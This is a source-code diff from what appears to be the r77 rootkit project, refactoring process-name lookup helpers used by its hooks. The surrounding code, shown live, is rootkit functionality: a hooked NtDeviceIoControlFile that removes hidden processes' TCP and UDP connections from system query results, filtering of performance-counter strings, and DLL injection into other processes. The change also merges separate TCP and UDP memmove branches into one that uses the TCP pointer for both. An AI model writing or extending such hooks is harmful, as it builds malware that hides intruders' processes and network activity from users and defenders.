GetProcessImageFileName test

Author: bytecode77

Helper/Helper.c

@@ -40,7 +40,7 @@ BOOL GetProcessList(PPROCESS_LIST_ENTRY entries, LPDWORD count)
 				PPROCESS_LIST_ENTRY entry = &entries[(*count)++];
 				entry->ProcessId = processEntry.th32ProcessID;
 				StrCpyW(entry->Name, processEntry.szExeFile);
-				GetProcessFileName(processEntry.th32ProcessID, TRUE, entry->FullName, MAX_PATH);
+				GetProcessPath(processEntry.th32ProcessID, entry->FullName, MAX_PATH);
 
 				BOOL is64Bit;
 				if (Is64BitProcess(processEntry.th32ProcessID, &is64Bit))

r77/Hooks.c

@@ -445,7 +445,7 @@ static NTSTATUS NTAPI HookedNtDeviceIoControlFile(HANDLE fileHandle, HANDLE even
 						BOOL hidden = FALSE;
 						if (nsiParam->Type == NsiTcp)
 						{
-							if (processEntry) GetProcessFileName(processEntry->TcpProcessId, FALSE, processName, MAX_PATH);
+							if (processEntry) GetProcessFileName(processEntry->TcpProcessId, processName, MAX_PATH);
 
 							hidden =
 								IsTcpLocalPortHidden(_byteswap_ushort(tcpEntry->Local.Port)) ||
@@ -456,7 +456,7 @@ static NTSTATUS NTAPI HookedNtDeviceIoControlFile(HANDLE fileHandle, HANDLE even
 						}
 						else if (nsiParam->Type == NsiUdp)
 						{
-							if (processEntry) GetProcessFileName(processEntry->UdpProcessId, FALSE, processName, MAX_PATH);
+							if (processEntry) GetProcessFileName(processEntry->UdpProcessId, processName, MAX_PATH);
 
 							hidden =
 								IsUdpPortHidden(_byteswap_ushort(udpEntry->Port)) ||
@@ -470,14 +470,7 @@ static NTSTATUS NTAPI HookedNtDeviceIoControlFile(HANDLE fileHandle, HANDLE even
 						{
 							if (i < nsiParam->Count - 1) // Do not move following entries, if this is the last entry
 							{
-								if (nsiParam->Type == NsiTcp)
-								{
-									memmove(tcpEntry, (LPBYTE)tcpEntry + nsiParam->EntrySize, (nsiParam->Count - i - 1) * nsiParam->EntrySize);
-								}
-								else if (nsiParam->Type == NsiUdp)
-								{
-									memmove(udpEntry, (LPBYTE)udpEntry + nsiParam->EntrySize, (nsiParam->Count - i - 1) * nsiParam->EntrySize);
-								}
+								memmove(tcpEntry, (LPBYTE)tcpEntry + nsiParam->EntrySize, (nsiParam->Count - i - 1) * nsiParam->EntrySize);
 
 								if (statusEntry)
 								{
@@ -783,7 +776,7 @@ static BOOL GetIsHiddenFromPdhString(LPCWSTR str)
 		else
 		{
 			WCHAR processName[MAX_PATH + 1];
-			if (GetProcessFileName(processId, FALSE, processName, MAX_PATH))
+			if (GetProcessFileName(processId, processName, MAX_PATH))
 			{
 				if (HasPrefix(processName) || IsProcessNameHidden(processName))
 				{

r77api/r77process.c

@@ -18,7 +18,7 @@ BOOL InjectDll(DWORD processId, LPBYTE dll, DWORD dllSize)
 			// Check, if the executable name is on the exclusion list (see: PROCESS_EXCLUSIONS)
 			BOOL processExcluded = FALSE;
 			WCHAR processName[MAX_PATH + 1];
-			if (GetProcessFileName(processId, FALSE, processName, MAX_PATH))
+			if (GetProcessFileName(processId, processName, MAX_PATH))
 			{
 				LPCWSTR exclusions[] = PROCESS_EXCLUSIONS;
 				for (int i = 0; i < sizeof(exclusions) / sizeof(LPCWSTR); i++)

r77api/r77win.c

@@ -182,17 +182,17 @@ BOOL GetProcessIntegrityLevel(HANDLE process, LPDWORD integrityLevel)
 
 	return result;
 }
-BOOL GetProcessFileName(DWORD processId, BOOL fullPath, LPWSTR fileName, DWORD fileNameLength)
+BOOL GetProcessFileName(DWORD processId, LPWSTR fileName, DWORD fileNameLength)
 {
 	BOOL result = FALSE;
 
 	HANDLE process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processId);
 	if (process)
 	{
 		WCHAR path[MAX_PATH + 1];
-		if (GetModuleFileNameExW(process, NULL, path, MAX_PATH))
+		if (GetProcessImageFileNameW(process, path, MAX_PATH))
 		{
-			PWCHAR resultFileName = fullPath ? path : PathFindFileNameW(path);
+			PWCHAR resultFileName = PathFindFileNameW(path);
 			if ((DWORD)lstrlenW(resultFileName) <= fileNameLength)
 			{
 				StrCpyW(fileName, resultFileName);
@@ -205,6 +205,28 @@ BOOL GetProcessFileName(DWORD processId, BOOL fullPath, LPWSTR fileName, DWORD f
 
 	return result;
 }
+BOOL GetProcessPath(DWORD processId, LPWSTR fileName, DWORD fileNameLength)
+{
+	BOOL result = FALSE;
+
+	HANDLE process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processId);
+	if (process)
+	{
+		WCHAR path[MAX_PATH + 1];
+		if (GetModuleFileNameExW(process, NULL, path, MAX_PATH))
+		{
+			if ((DWORD)lstrlenW(path) <= fileNameLength)
+			{
+				StrCpyW(fileName, path);
+				result = TRUE;
+			}
+		}
+
+		CloseHandle(process);
+	}
+
+	return result;
+}
 BOOL GetProcessUserName(HANDLE process, PWCHAR name, LPDWORD nameLength)
 {
 	BOOL result = FALSE;

r77api/r77win.h

@@ -91,17 +91,27 @@ LPVOID GetFunction(LPCSTR dll, LPCSTR function);
 /// </returns>
 BOOL GetProcessIntegrityLevel(HANDLE process, LPDWORD integrityLevel);
 /// <summary>
-/// Gets the filename or the full path of a process.
+/// Gets the filename of a process.
 /// </summary>
-/// <param name="processId">The process ID to retrieve the filename or full path from.</param>
-/// <param name="fullPath">TRUE to return the full path, FALSE to return only the filename.</param>
-/// <param name="fileName">A buffer to write the filename or full path to.</param>
+/// <param name="processId">The process ID to retrieve the filename from.</param>
+/// <param name="fileName">A buffer to write the filename to.</param>
 /// <param name="fileNameLength">The length of the fileName buffer.</param>
 /// <returns>
 /// TRUE, if this function succeeds;
 /// otherwise, FALSE.
 /// </returns>
-BOOL GetProcessFileName(DWORD processId, BOOL fullPath, LPWSTR fileName, DWORD fileNameLength);
+BOOL GetProcessFileName(DWORD processId, LPWSTR fileName, DWORD fileNameLength);
+/// <summary>
+/// Gets the full path of a process.
+/// </summary>
+/// <param name="processId">The process ID to retrieve the full path from.</param>
+/// <param name="fileName">A buffer to write full path to.</param>
+/// <param name="fileNameLength">The length of the fileName buffer.</param>
+/// <returns>
+/// TRUE, if this function succeeds;
+/// otherwise, FALSE.
+/// </returns>
+BOOL GetProcessPath(DWORD processId, LPWSTR fileName, DWORD fileNameLength);
 /// <summary>
 /// Gets the username of a process.
 /// </summary>